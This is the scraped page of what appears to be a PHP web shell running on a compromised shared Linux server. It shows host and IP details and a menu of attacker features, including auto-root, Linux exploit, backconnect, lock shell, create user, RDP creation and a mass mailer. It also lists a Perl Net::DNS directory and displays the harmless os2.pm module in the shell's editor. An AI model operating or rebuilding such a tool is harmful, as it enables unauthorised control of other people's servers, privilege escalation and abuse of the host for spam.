Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Net /
DNS /
Resolver /
[ HOME SHELL ]
Name
Size
Permission
Action
Base.pm
31.18
KB
-rw-r--r--
MSWin32.pm
3.62
KB
-rw-r--r--
Recurse.pm
5.56
KB
-rw-r--r--
UNIX.pm
2.19
KB
-rw-r--r--
android.pm
2.27
KB
-rw-r--r--
cygwin.pm
4.83
KB
-rw-r--r--
os2.pm
2.05
KB
-rw-r--r--
os390.pm
4.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : os2.pm
package Net::DNS::Resolver::os2; use strict; use warnings; our $VERSION = (qw$Id: os2.pm 1856 2021-12-02 14:36:25Z willem $)[2]; =head1 NAME Net::DNS::Resolver::os2 - OS2 resolver class =cut use base qw(Net::DNS::Resolver::Base); my $config_file = 'resolv'; my @config_path = ( $ENV{ETC} || '/etc' ); my @config_file = grep { -f $_ && -r _ } map {"$_/$config_file"} @config_path; my $dotfile = '.resolv.conf'; my @dotpath = grep {$_} $ENV{HOME}, '.'; my @dotfile = grep { -f $_ && -o _ } map {"$_/$dotfile"} @dotpath; sub _init { my $defaults = shift->_defaults; $defaults->_read_config_file($_) foreach @config_file; %$defaults = Net::DNS::Resolver::Base::_untaint(%$defaults); $defaults->_read_config_file($_) foreach @dotfile; $defaults->_read_env; return; } 1; __END__ =head1 SYNOPSIS use Net::DNS::Resolver; =head1 DESCRIPTION This class implements the OS specific portions of C<Net::DNS::Resolver>. No user serviceable parts inside, see L<Net::DNS::Resolver> for all your resolving needs. =head1 COPYRIGHT Copyright (c)2012 Dick Franks. All rights reserved. =head1 LICENSE Permission to use, copy, modify, and distribute this software and its documentation for any purpose and without fee is hereby granted, provided that the original copyright notices appear in all copies and that both copyright notice and this permission notice appear in supporting documentation, and that the name of the author not be used in advertising or publicity pertaining to distribution of the software without specific prior written permission. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. =head1 SEE ALSO L<perl>, L<Net::DNS>, L<Net::DNS::Resolver> =cut
Close